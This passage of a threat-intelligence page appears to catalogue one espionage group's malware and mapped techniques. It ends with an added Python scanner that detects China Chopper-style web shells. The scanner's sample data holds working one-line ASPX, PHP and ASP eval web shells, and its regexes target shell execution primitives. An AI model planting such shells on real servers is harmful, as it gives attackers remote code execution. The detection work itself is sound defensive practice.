Techniques: Account Discovery: Domain Account; Account Discovery: Local Account; Account Manipulation: Additional Local or Domain Groups; Create Account: Local Account; Create Account: Domain Account; Indicator Removal: Network Share Connection Removal; Network Share Discovery; Password Policy Discovery; Permission Groups Discovery: Domain Groups; Permission Groups Discovery: Local Groups; Remote Services: SMB/Windows Admin Shares; Remote System Discovery; System Network Connections Discovery; System Service Discovery; System Services: Service Execution; System Time Discovery

S0104 netstat [4]
Techniques: System Network Connections Discovery

S0664 Pandora [5]
Techniques: Application Layer Protocol: Web Protocols; Create or Modify System Process: Windows Service; Encrypted Channel: Symmetric Cryptography; Exploitation for Privilege Escalation; Hijack Execution Flow: DLL; Ingress Tool Transfer; Modify Registry; Obfuscated Files or Information: Compression; Process Discovery; Process Injection; Subvert Trust Controls: Code Signing Policy Modification; System Services: Service Execution; Traffic Signaling

S0013 PlugX [1] [2] [6] [4] [12]
Techniques: Application Layer Protocol: Web Protocols; Application Layer Protocol: DNS; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter: Windows Command Shell; Create or Modify System Process: Windows Service; Data Staged: Local Data Staging; Debugger Evasion; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Execution Guardrails: Mutual Exclusion; Exfiltration Over C2 Channel; File and Directory Discovery; Hide Artifacts: Hidden Files and Directories; Hide Artifacts: Hidden Window; Hijack Execution Flow: DLL; Impair Defenses: Disable or Modify System Firewall; Indicator Removal: Clear Persistence; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Local Storage Discovery; Masquerading: Masquerade Task or Service; Masquerading: Match Legitimate Resource Name or Location; Modify Registry; Native API; Network Share Discovery; Non-Application Layer Protocol; Non-Standard Port; Obfuscated Files or Information: Binary Padding; Obfuscated Files or Information: Dynamic API Resolution; Obfuscated Files or Information; Obfuscated Files or Information: Encrypted/Encoded File; Peripheral Device Discovery; Process Discovery; Query Registry; Reflective Code Loading; Replication Through Removable Media; Scheduled Task/Job: Scheduled Task; Screen Capture; System Information Discovery; System Location Discovery; System Network Configuration Discovery; System Network Connections Discovery; System Owner/User Discovery; System Time Discovery; Trusted Developer Utilities Proxy Execution: MSBuild; User Execution: Malicious File; Virtualization/Sandbox Evasion: System Checks; Web Service: Dead Drop Resolver

S0006 pwdump [9]
Techniques: OS Credential Dumping: Security Account Manager

S0662 RCSession [5] [4] [12]
Techniques: Abuse Elevation Control Mechanism: Bypass User Account Control; Application Layer Protocol: Web Protocols; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Command and Scripting Interpreter: Windows Command Shell; Data from Local System; Encrypted Channel; Hijack Execution Flow: DLL; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Keylogging; Masquerading; Modify Registry; Native API; Non-Application Layer Protocol; Obfuscated Files or Information: Compression; Obfuscated Files or Information: Fileless Storage; Process Discovery; Process Injection: Process Hollowing; Screen Capture; System Binary Proxy Execution: Msiexec; System Information Discovery; System Owner/User Discovery

S0096 Systeminfo [4]
Techniques: System Information Discovery

S0663 SysUpdate [5]
Techniques: Application Layer Protocol: DNS; Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; Create or Modify System Process: Systemd Service; Create or Modify System Process: Windows Service; Data Encoding: Standard Encoding; Data from Local System; Deobfuscate/Decode Files or Information; Encrypted Channel: Symmetric Cryptography; Exfiltration Over C2 Channel; File and Directory Discovery; Hide Artifacts: Hidden Files and Directories; Hijack Execution Flow: DLL; Indicator Removal: File Deletion; Ingress Tool Transfer; Local Storage Discovery; Masquerading: Masquerade Task or Service; Modify Registry; Native API; Obfuscated Files or Information: Fileless Storage; Obfuscated Files or Information: Encrypted/Encoded File; Obfuscated Files or Information: Software Packing; Process Discovery; Screen Capture; Subvert Trust Controls: Code Signing; System Information Discovery; System Network Configuration Discovery: Internet Connection Discovery; System Network Configuration Discovery; System Owner/User Discovery; System Service Discovery; System Services: Service Execution; Windows Management Instrumentation

S0057 Tasklist [4]
Techniques: Process Discovery; Software Discovery: Security Software Discovery; System Service Discovery

S0005 Windows Credential Editor [1]
Techniques: OS Credential Dumping: LSASS Memory

S0412 ZxShell [13]
Techniques: Access Token Manipulation: Create Process with Token; Application Layer Protocol: Web Protocols; Application Layer Protocol: File Transfer Protocols; Command and Scripting Interpreter: Windows Command Shell; Create Account: Local Account; Create or Modify System Process: Windows Service; Data from Local System; Endpoint Denial of Service; Exploit Public-Facing Application; File and Directory Discovery; Impair Defenses: Disable or Modify System Firewall; Impair Defenses: Disable or Modify Tools; Indicator Removal: Clear Windows Event Logs; Indicator Removal: File Deletion; Ingress Tool Transfer; Input Capture: Credential API Hooking; Input Capture: Keylogging; Modify Registry; Native API; Network Service Discovery; Non-Standard Port; Process Discovery; Process Injection: Dynamic-link Library Injection; Proxy; Query Registry; Remote Services: VNC; Remote Services: Remote Desktop Protocol; Screen Capture; System Binary Proxy Execution: Rundll32; System Information Discovery; System Owner/User Discovery; System Service Discovery; System Services: Service Execution; Video Capture
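Web shells recur throughout this page: China Chopper and ASPXSpy in the software list, "a variety of Web shells" under T1505.003, and compromised Internet-facing servers reused as exfiltration staging points under T1074.002. The following is an added example for this page, not MITRE's or any vendor's code. It scans a web root for the code-execution primitive that one-line eval shells rely on (the publicly documented China Chopper forms for ASPX, PHP and classic ASP) plus a broader ASPX process-execution heuristic for ASPXSpy-type uploads, and skips files the server would never execute. The web root and its files are constructed for the demonstration; the pattern list is a starting point, not a complete signature set.

```python
"""Scan a web root for the one-line eval web shells (China Chopper-style) that the
page says the group plants on Internet-facing servers and reuses as staging points.
Added example for this page, not MITRE's or any vendor's code. The directory and
files are constructed; the shell one-liners are the publicly documented China
Chopper forms for ASPX, PHP and classic ASP."""
import os
import re
import tempfile
from typing import Dict, List

SERVER_SIDE_EXTENSIONS = (".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp")

# Match the code-execution primitive rather than a file name or hash, so renamed copies are caught.
SHELL_PATTERNS = [
    ("chopper_aspx", re.compile(r'eval\s*\(\s*Request\.Item\s*\[\s*"[^"]+"\s*\]\s*,\s*"unsafe"', re.I)),
    ("chopper_php", re.compile(r"@?eval\s*\(\s*\$_(POST|REQUEST|GET)\s*\[", re.I)),
    ("chopper_asp", re.compile(r'eval\s*\(?\s*request\s*\(\s*"[^"]+"\s*\)', re.I)),
    # Broader ASPX heuristic for command-execution shells (ASPXSpy-type uploads); review hits by hand.
    ("aspx_process_exec", re.compile(r"Process(StartInfo|\.Start)\b|cmd\.exe", re.I)),
]


def scan_file(path: str) -> List[str]:
    """Return the labels of every shell pattern found in one file."""
    with open(path, "r", encoding="utf-8", errors="ignore") as fh:
        content = fh.read()
    return [label for label, rx in SHELL_PATTERNS if rx.search(content)]


def scan_webroot(root: str) -> Dict[str, dict]:
    """Walk a web root; return {relative path: {"size": bytes, "hits": labels}} for files that matched."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SERVER_SIDE_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = {"size": os.path.getsize(full), "hits": hits}
    return findings


def demo() -> Dict[str, dict]:
    """Create a constructed web root with three shells and two benign files, then scan it."""
    samples = {
        "aspnet_client/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
        "images/logo.php": "<?php @eval($_POST['key']); ?>",
        "admin/legacy.asp": '<%eval request("cmd")%>',
        "default.aspx": '<%@ Page Language="C#" %>\n<html><body>Welcome</body></html>\n',
        "index.html": 'eval(Request.Item["x"],"unsafe")',  # not a server-side extension: never executed, so skipped
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            full = os.path.join(tmp, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, info in sorted(demo().items()):
        print(f"{rel}: {info['hits']} ({info['size']} bytes)")
```

Reported sizes matter in triage: China Chopper server components are a few dozen bytes, so a tiny file with an eval hit in `aspnet_client`, `images` or an Exchange or SharePoint layouts directory is close to a certain finding, whereas an `aspx_process_exec` hit in a large legitimate application page needs a human look. Pair the scan with file-creation times from the web server's own logs to find the request that dropped the file.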
References
[1] Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
[2] Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.
[3] Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
[4] Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
[5] Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.
[6] Pantazopoulos, N. and Henry, T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.
[7] Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.
[8] Gallagher, S. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as "watering holes". Retrieved January 25, 2016.
[9] Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
[10] Microsoft. (2025, September 8). How Microsoft names threat actors. Retrieved September 10, 2025.
[11] Lunghi, D. (2023, March 1). Iron Tiger's SysUpdate Reappears, Adds Linux Targeting. Retrieved March 20, 2023.
[12] Global Threat Center, Intelligence Team. (2020, December). APT27 Turns to Ransomware. Retrieved November 12, 2021.
[13] Counter Threat Unit Research Team. (2019, February 27). A Peek into BRONZE UNION's Toolbox. Retrieved September 24, 2019.
[14] Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.